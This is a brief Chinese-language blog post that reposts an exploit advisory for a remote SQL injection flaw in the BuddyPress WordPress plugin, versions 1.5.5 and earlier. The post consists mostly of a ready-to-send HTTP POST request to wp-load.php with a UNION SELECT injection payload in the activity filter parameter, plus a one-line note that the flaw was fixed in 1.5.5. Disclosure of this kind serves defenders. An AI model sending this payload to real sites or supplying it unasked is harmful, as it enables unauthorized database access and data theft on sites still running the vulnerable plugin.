WordPress插件Buddypress远程SQL注射及修复

    作者: Ivan Terkin
    类型: Remote Exploit
    漏洞: Remote SQL Injection
    软件下载地址: buddypress.org
    影响版本: 1.5.5及以下
    测试平台: Buddypress 1.5.4
     
     
    POST /wp-load.php HTTP/1.1
    User-Agent: Mozilla
    Host: www.xxxx.com
    Accept: */*
    Referer: http://www.badguest.cn /activity/?s=b
    Connection: Keep-Alive
    Content-Length: 153
    Content-Type: application/x-www-form-urlencoded
     
    action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+
     
    修复方案:
     
    已经报告给官方并且在 1.5.5版进行了修复

    本博客所有文章如无特别注明均为原创。
    复制或转载请以超链接形式注明转自n0elle's Blog,原文地址《WordPress插件Buddypress远程SQL注射及修复
    标签:
    喜欢 | 0
    分享:

还没有人抢沙发呢~